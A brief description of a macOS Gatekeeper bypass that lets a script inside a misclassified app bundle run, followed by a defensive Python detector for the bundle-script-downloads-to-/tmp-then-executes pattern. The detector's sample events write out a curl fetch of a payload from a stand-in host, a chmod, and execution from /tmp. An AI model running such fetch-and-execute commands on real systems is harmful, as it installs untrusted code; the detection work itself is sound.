macOS Gatekeeper Bypass
Original Post:
We discussed this vulnerability during Episode 75 on 04 May 2021
Gatekeeper would misclassify certain types of applications, allowing them to run without any restriction. Specifically, you can confuse the policy engine about whether the app is bundled or not: it can be tricked into treating an app bundle as if it were not one, so the app is misclassified and the script inside it gets the allowed flag set, skipping the checks a bundle would normally be subject to.
Once allowed, the script can download a binary to /tmp and execute it.
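The post-bypass behaviour above (a script living inside an .app bundle pulls a binary into /tmp and runs it) is a process-lineage pattern a detection team can hunt for regardless of how Gatekeeper was fooled. The sketch below is an added example written for this summary, not code from the original post, from Apple or from the researcher. The event schema (`ProcEvent`), the sample process events, the `Evil.app` path and the `example.invalid` URL are all constructed for illustration; the rule only recognises explicit curl/wget output flags, which is a simplifying assumption.

```python
"""Toy detection for 'bundle script downloads to /tmp, then executes it'.

The event format is constructed for this example and is not a real macOS
log schema (assumption). Real telemetry (e.g. Endpoint Security exec events)
would be mapped onto ProcEvent before calling detect_tmp_droppers().
"""
from __future__ import annotations

import os
from dataclasses import dataclass


@dataclass
class ProcEvent:
    ts: int        # event time in seconds (monotonic for the example)
    pid: int
    ppid: int
    image: str     # path of the executable image
    argv: list     # full argument vector


DOWNLOADERS = {"curl", "wget"}
OUTPUT_FLAGS = {"-o", "-O", "--output", "--output-document"}
TMP_DIRS = ("/tmp/", "/private/tmp/")


def norm(path: str) -> str:
    """On macOS /tmp is a symlink to /private/tmp; treat both spellings alike."""
    return "/tmp/" + path[len("/private/tmp/"):] if path.startswith("/private/tmp/") else path


def in_tmp(path: str) -> bool:
    return path.startswith(TMP_DIRS)


def bundle_script(ev: ProcEvent):
    """Return the .app path if this process is an interpreter running a script
    from inside an app bundle, else None. Option-looking args are skipped."""
    for arg in ev.argv[1:]:
        if arg.startswith("-"):
            continue
        idx = arg.find(".app/Contents/")
        if idx != -1:
            return arg[: idx + len(".app")]
    return None


def download_target(ev: ProcEvent):
    """Output path of a curl/wget invocation, or None.
    Only explicit output flags are considered (assumption)."""
    if os.path.basename(ev.image) not in DOWNLOADERS:
        return None
    for i, arg in enumerate(ev.argv[:-1]):
        if arg in OUTPUT_FLAGS:
            return norm(ev.argv[i + 1])
    return None


def ancestors(pid: int, by_pid: dict):
    """Yield the process and its ancestors; stop at unknown ppid or a cycle."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        ev = by_pid[pid]
        yield ev
        pid = ev.ppid


def detect_tmp_droppers(events, window: int = 300):
    """Alert when something executed from /tmp was downloaded there, within
    `window` seconds, by a descendant of the same bundle-resident script."""
    by_pid = {e.pid: e for e in events}
    downloads = {}  # (bundle-script pid, normalised target path) -> download event
    for ev in events:
        target = download_target(ev)
        if target is None or not in_tmp(target):
            continue
        for anc in ancestors(ev.pid, by_pid):
            if bundle_script(anc):
                downloads.setdefault((anc.pid, target), ev)
                break
    alerts = []
    for ev in events:
        if not in_tmp(ev.image):
            continue
        for anc in ancestors(ev.pid, by_pid):
            app = bundle_script(anc)
            if app is None:
                continue
            dl = downloads.get((anc.pid, norm(ev.image)))
            if dl is not None and 0 <= ev.ts - dl.ts <= window:
                alerts.append({"bundle": app, "script_pid": anc.pid,
                               "payload": ev.image, "download_pid": dl.pid,
                               "exec_pid": ev.pid})
            break  # only the nearest bundle-resident ancestor matters
    return alerts


# Constructed sample events: one malicious chain, one benign build job in /tmp.
SAMPLE_EVENTS = [
    ProcEvent(100, 500, 1, "/bin/sh", ["/bin/sh", "/Users/victim/Downloads/Evil.app/Contents/MacOS/Evil"]),
    ProcEvent(101, 501, 500, "/usr/bin/curl", ["curl", "-s", "-o", "/tmp/payload", "http://example.invalid/payload"]),
    ProcEvent(102, 502, 500, "/bin/chmod", ["chmod", "+x", "/tmp/payload"]),
    ProcEvent(103, 503, 500, "/tmp/payload", ["/tmp/payload"]),
    ProcEvent(200, 600, 1, "/usr/bin/python3", ["python3", "/Users/dev/build.py"]),
    ProcEvent(201, 601, 600, "/tmp/build-abc/configure", ["/tmp/build-abc/configure"]),
]

if __name__ == "__main__":
    for alert in detect_tmp_droppers(SAMPLE_EVENTS):
        print(alert)
```

Keying the download on the bundle-resident script's pid rather than on the immediate parent is deliberate: the fetch and the exec are often siblings (both children of the script), not parent and child, and a rule that only looks at direct parents misses that shape. The benign build job shows the other half of the design: executing from /tmp alone is not enough to alert; the ancestry back to an app-bundle script is what makes it interesting.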